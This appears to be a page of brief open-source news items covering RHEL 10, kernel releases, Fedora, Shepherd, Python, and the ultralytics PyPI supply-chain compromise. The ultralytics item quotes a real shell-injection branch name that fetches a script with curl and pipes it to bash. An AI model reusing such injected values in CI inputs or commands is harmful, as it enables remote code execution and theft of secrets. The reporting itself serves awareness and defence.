The Red Hat Enterprise Linux (RHEL) 10 beta was released in mid-November and, if all goes according to plan, CentOS Stream 10 should be released before the end of the year. While nothing is etched in stone just yet, it is a good time for anyone using or targeting RHEL (and its clones) to start taking a look at how Stream 10, and the corresponding EPEL repository, is shaping up. This is not only important to RHEL and Stream users, but anyone deploying and supporting software on enterprise Linux (EL) derivatives like AlmaLinux, Oracle Linux, and Rocky Linux as well.
Greg Kroah-Hartman has released version 6.6.65 of the kernel:
This release only fixes a build regression for openrisc, and a runtime regression for domU guests. If you don't have problems with them, no need to upgrade.The Linux kernel has many tunable parameters. While there is much advice available on the internet about how to set them, few people have the time to weed through the (often contradictory) explanations and choose appropriate values. One possible way to address this is a project called bpftune, a program that uses BPF to track various metrics about a running system and adjust the sysctl knobs appropriately. The program is developed by Oracle, and is available under a GPLv2 license. Bpftune is currently mostly focused on optimizing network settings, but the authors hope that the system is flexible enough to be extended to cover other settings.
Fedora Project Leader (FPL) Matthew Miller writes that he will soon be hanging up the FPL hat:
Stay tuned for a job posting from Red Hat, and details about all that. I'm hoping we can hire someone awesome early in 2025, and make the official handover on the release of auspiciously-numbered Fedora Linux 42.
I'm not going to leave Fedora, though. As I said above, although it might not always feel like it from the outside, Red Hat support for Fedora is stronger than ever, and I plan on helping that grow even more. I'm stepping into a full-time management role in the Community Linux Engineering organization, so Fedora will still be part of my day job, just in a different way.
This 1.0.0 release is published today because we think Shepherd has become a solid tool, meeting user experience standards one has come to expect since systemd changed the game of free init systems and service managers alike. It's also a major milestone for Guix, which has been relying on the Shepherd from a time when doing so counted as dogfooding.
When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts interviews of the candidates in order to help Fedora contributors make an informed choice. This year, the candidates are Zbigniew Jędrzejewski-Szmek, Tomáš Hrčka, Josh Stone, David Cantrell, Fabio Alessandro Locati, and Kevin Fenzi. All of them except for Locati are current members of the steering council. Voting is open until December 20.
In 2019, the Python community had a lengthy discussion about changing the rules (that some find counterintuitive) on using break, continue, or return statements in finally blocks. These are all ways of jumping out of a finally block, which can interrupt the handling of a raised exception. At the time, the Python developers chose not to change things, because the consensus was that the existing behavior was not a problem. Now, after a report put together by Irit Katriel, the project is once again considering changing the language.
For a detailed description of how the exploit works, see this blog post.
Then, as the hash collision occurred, the server returns the overwritten build artifact to the legitimate request that requests the following packages. [...]
By abusing this, an attacker could force the user to upgrade to the malicious firmware, which could lead to the compromise of the device.
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.